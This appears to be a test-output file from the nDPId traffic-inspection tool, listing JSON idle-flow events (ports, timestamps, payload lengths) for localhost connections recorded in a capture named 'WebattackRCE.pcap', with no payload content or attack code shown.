-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7440000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
